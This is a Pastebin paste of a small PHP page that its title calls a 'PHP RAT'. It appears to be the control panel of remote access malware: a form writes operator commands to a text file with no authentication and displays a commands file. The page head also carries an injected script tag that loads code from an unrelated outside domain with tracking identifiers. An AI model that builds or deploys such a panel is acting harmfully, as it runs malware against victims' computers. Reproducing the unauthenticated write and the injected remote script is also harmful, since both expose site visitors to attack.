Advertisement
hungvb

Post Php Update information on the application!

Sep 23rd, 2021
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.24 KB | None | 0 0
  1. <?php
  2. if(isset($_POST['submit']))
  3. {
  4. $text = $_POST['text'];
  5. file_put_contents("cm.txt", $text);
  6. }
  7. ?>
  8.  
  9. <html>
  10. <head>
  11.   <title>Bờm Khùng Coder PHP RAT</title>
  12. <script data-type="injected" src="//www.technologieyvonlheureux.com/addon/script/content_site?integration=anywhere&v=d9.68.1.18&os_mj=6&os_mn=1&os_bitness=64&mid=dc59998d19f63d43ceaec464375eedfd&uid=BE87A09AEA8E3F61A304445E1FAE8206&aid=1650&aid2=none&ts=1466297822&ts2="></script></head>
  13. <body style="background-image: url('https://upload.wikimedia.org/wikipedia/commons/thumb/a/a7/Flag_of_Afghanistan_(1880%E2%80%931901).svg/2000px-Flag_of_Afghanistan_(1880%E2%80%931901).svg.png'); color: white">
  14.   <center>
  15.    <div style="background-color: black"><img src="https://lh6.googleusercontent.com/r7q_QixaHG4DMaR09hLqUKu1GgtbuPyPPIG_ii9C8yGHG0i0eQifm4ACbUsfbchZISB9Hzibrg=s640-h400-e365" alt="PHP RAT" /></div>
  16.    <form action="#" method="POST" style="height: 520px; width: 480px">
  17.     <textarea name="text" style="background-color: #333; color: white; width: 100%; height: 250px"><?php echo file_get_contents("commands.txt"); ?></textarea>
  18.     <br />
  19.     <input type="submit" name="submit" value="Save" style="margin-right: -1px; float: right" />
  20.    </form>
  21.   </center>
  22. </body>
  23. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement